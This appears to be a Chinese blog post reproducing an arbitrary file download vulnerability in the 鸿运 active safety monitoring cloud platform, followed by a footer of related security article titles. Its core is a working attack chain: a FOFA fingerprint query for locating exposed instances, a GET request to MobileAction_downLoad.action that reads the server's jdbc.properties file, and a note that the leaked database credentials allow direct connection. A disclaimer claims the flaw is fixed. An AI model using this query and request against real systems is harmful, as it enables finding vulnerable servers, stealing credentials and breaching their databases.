漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明:

**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

**

一:漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

二:漏洞影响版本

鸿运主动安全监控云平台

三:网络空间测绘查询

fofa:
body="./open/webApi.html"

四:漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

五:漏洞利用

读取到数据库账号密码,直接连接

相关推荐
安卓开发者40 分钟前
鸿蒙NEXT安全单元访问开发指南:构建可信应用的安全基石
安全·华为·harmonyos
RrEeSsEeTt1 小时前
【HackTheBox】- Eureka 靶机学习
linux·网络安全·渗透测试·kali·hackthebox
安当加密2 小时前
如何安全地在 Kubernetes 中管理凭据?——基于 SMS 凭据管理系统的实践探索
安全·容器·kubernetes
luluvx2 小时前
RenderDoc_GPU资源提取简述
安全
猫耳君10 小时前
汽车网络安全 CyberSecurity ISO/SAE 21434 测试之四
安全·web安全·网络安全·汽车·测试·security·cybersecurity
余防13 小时前
XXE - 实体注入(xml外部实体注入)
xml·前端·安全·web安全·html
歪歪10016 小时前
Http与WebSocket网络通信协议的对比
网络·websocket·网络协议·计算机网络·http·网络安全·信息与通信
粟悟饭&龟波功18 小时前
【网络安全】二、入门篇:HTTP 协议进阶 ——GET/POST 常用传参方法详解
安全·web安全·http
AORO202518 小时前
三防手机是什么?有哪些值得购入的三防手机?
网络·5g·安全·智能手机·信息与通信
thginWalker19 小时前
安全系统架构
安全·系统架构